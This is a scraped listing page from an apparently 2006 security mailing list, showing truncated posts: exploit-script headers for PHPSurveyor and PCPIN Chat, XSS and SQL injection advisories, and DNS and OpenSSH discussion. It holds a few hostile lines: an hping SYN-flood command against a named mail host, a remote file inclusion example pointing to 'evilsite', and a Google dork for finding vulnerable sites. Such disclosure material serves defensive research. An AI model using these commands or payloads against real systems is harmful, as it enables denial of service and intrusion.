|
|
Colapse all |
Post message
PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn 2006-04-20 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "********************************************************************\r\ n"; echo "* PHPSurveyor <= 0.995 'save.php/surveyid' remote cmmnds xctn *\r\n"; echo "* by rgod rgod (at) autistici (dot) org [email concealed] site: http://retrogod.altervista.org *\r\n"; echo "* a speci [ more ] [ reply ] [eVuln] MWGuest XSS Vulnerability 2006-04-20 alex evuln com New eVuln Advisory: MWGuest XSS Vulnerability http://evuln.com/vulns/122/summary.html --------------------Summary---------------- eVuln ID: EV0122 Vendor: Manic Web Software: MWGuest Sowtware's Web Site: http://www.manicweb.co.uk/ Versions: 2.1.0 Critical Level: Harmless Type: Cross-Site Scripting [ more ] [ reply ] ASPSitem <= 1.83 Remote SQL Injection Vulnerability 2006-04-19 Mustafa Can Bjorn IPEKCI (nukedx nukedx com) --Security Report-- Advisory: ASPSitem <= 1.83 Remote SQL Injection Vulnerability. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 19/04/06 19:33 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: ASPSitem (http://www.aspsitem.com) [ more ] [ reply ] Strengthen OpenSSH security? 2006-04-18 Brett Glass (brett lariat org) I'm sure that most folks with hosts that expose an OpenSSH daemon to the Internet have been getting the usual probes and password guessing attempts and have been taking appropriate actions (e.g. setting AllowUsers and using strong passwords) to protect yourselves. But today, on one of my servers [ more ] [ reply ] SQL Injection in incredibleindia.org 2006-04-16 susam_pal yahoo co in Vulnerable Page: http://www.incredibleindia.org/newsite/cms_Page.asp Found By: Susam Pal Found On: 29th March, 2006, Wednesday Vulnerability Type: SQL Injection Action Taken: Reported to admin (at) incredibleindia (dot) org [email concealed] Description: www.incredibleindia.org is a tourism website. The site is prone to S [ more ] [ reply ] Re: Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotaged hosts-file lookup 2006-04-16 somerandomaddress99 mailinator com [USN-271-1] Firefox vulnerabilities 2006-04-19 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-271-1 April 19, 2006 mozilla-firefox, firefox vulnerabilities CVE-2005-4134, CVE-2006-0292, CVE-2006-0296, CVE-2006-0749, CVE-2006-1727, CVE-2006-1728, CVE-2006-1729, CVE-2006-1730, CVE-2006-1731, CVE-2006-17 [ more ] [ reply ] EasyGallery Cross-Site Scripting 2006-04-19 botan linuxmail org Website : www.wingnut.net.ms Author : Botan Credits : B3g0k,Nistiman,flot,Netqurd Original Advisory : http://advisory.patriotichackers.com/index.php?itemid=5 Description : "EasyGallery is a simple web-photogallery with a maximum of user-friendlyness. All you have to do is to upload your photos an [ more ] [ reply ] [eVuln] MD News Authentication Bypass and SQL Injection Vulnerabilities 2006-04-18 alex evuln com New eVuln Advisory: MD News Authentication Bypass and SQL Injection Vulnerabilities http://evuln.com/vulns/120/summary.html --------------------Summary---------------- eVuln ID: EV0120 Software: MD News Sowtware's Web Site: http://www.matthewdingley.co.uk/ Versions: 1 Critical Level: Moderate Type: [ more ] [ reply ] Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-16 somebody rtr ca Tlen.PL e-mail XSS vulnerability. 2006-04-15 koper pass pl As written in: http://security.pass.pl/adv/160406_XSS_tlen_pl.txt ::File: 060416_XSS_tlen_pl ::Date: 16 Feb 2006 ::Author: Tomasz Koperski <koper (at) pass (dot) pl [email concealed]> ::URL: http://security.pass.pl ::1::Overview:: Tlen.PL e-mail system is affected to cross-site scripting vulnerability, not validating HTML t [ more ] [ reply ] Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-16 no spam my house Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are actually still using Windows for anything other than playing games) You just add an entry in your DNS server with a zone matching the hostname that you want to override. And if they have the IP addresses of MSFT-control [ more ] [ reply ] RE: redirection vuln crawlers breed & security through obscurity 2006-04-19 Evans, Arian (Arian Evans fishnetsecurity com) 1. This is definitely a pretty common, if not well-known problem, being "broken access control" that relies on obscurity or something weak/trivial to forge (like an HTTP refer field path) to control access to an entry point in a webapp. Sometimes, no further authorization checks are made (on pages/f [ more ] [ reply ] Fortinet28 box does not resist has small synflood! 2006-04-16 testx444 hushmail com Fortinet28 box does not resist has small synflood on smtp port! ips protection is not effective because there is not enough syn! hping -i u10 -p 25 -S mail.fortinet.com Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the [ more ] [ reply ] Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-17 john johnsdomain org The XP DNS client has other problems as well. It caches DNS failiures (arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into an internet network that has local domains which need to resolve to RFC1918 addresses. The cached failed lookups get prefered to forced entries in t [ more ] [ reply ] Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup 2006-04-17 robsekeris hotmail com After reading your scary message, went to verify your points and confirmed all. Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal Firewall is for free) on top of a router firewall, I've been able to block or force a request as I see fit for each of these sites. On WMP, un [ more ] [ reply ] redirection vuln crawlers breed & security through obscurity 2006-04-15 Ivan Sergio Borgonovo (mail webthatworks it) I just came across such kind of code (php) written by a colegue: //header.inc if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW') header("Location: ./login.html"); //missing else to mitigate the problem!! //HTML stuff here... code structure of all the other "supposed to be" pri [ more ] [ reply ] PCPIN Chat <= 5.0.4 "login/language" remote cmmnds xctn 2006-04-19 rgod autistici org #!/usr/bin/php -q -d short_open_tag=on <? echo "PCPIN Chat <= 5.0.4 \"login/language\" remote cmmnds xctn\r\n"; echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "-> works with magic_quotes_gpc = Off\r\n"; echo "dork: \"powered by PCPIN.com\"\r\n\r\n"; [ more ] [ reply ] |
|
Privacy Statement |
Site: http://www.alshmokh.com
nono225-mHOn-rageh-port-Lover hacker-Breeeeh
#################################
-------example:
http://[target].com/path/axoverzicht.cgi?maand=http://evilsite
--------google:
inurl:"axoverzicht.cgi?maand";
[ more ] [ reply ]